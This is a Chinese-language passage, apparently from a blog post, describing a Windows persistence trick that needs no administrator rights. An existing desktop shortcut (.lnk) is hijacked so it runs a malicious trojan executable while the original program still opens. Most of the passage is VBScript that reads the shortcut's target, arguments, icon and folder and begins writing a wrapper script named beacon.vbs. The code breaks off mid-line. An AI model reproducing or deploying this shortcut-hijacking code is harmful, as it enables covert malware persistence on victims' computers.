这种方式我觉得挺好用的，且不需要管理员权限，我们都知道lnk文件可以指向一个exe文件，相当于一个快捷方式，所以我们可以更改指向的文件，指向我们的exe文件，但是这样的话原本的lnk文件就没用了，所以我们可以CreateShortcut方法来创建lnk快捷方式，在不损坏其原始lnk文件的情况下且可以执行我们的恶意文件。

如下vbs代码:

implant = "C:\tasks\恶意木马.exe"
newTarget = "C:\tasks\beacon.vbs"
lnkName = "C:\Users\Admin\Desktop\xxx.exe.lnk"

set WshShell = WScript.CreateObject("WScript.Shell" )
strDesktop = WshShell.SpecialFolders("Desktop" )
set oShellLink = WshShell.CreateShortcut(strDesktop & "\" & lnkName )
origTarget = oShellLink.TargetPath
origArgs = oShellLink.Arguments
origIcon = oShellLink.IconLocation
origDir = oShellLink.WorkingDirectory

Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(newTarget,True)
File.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WS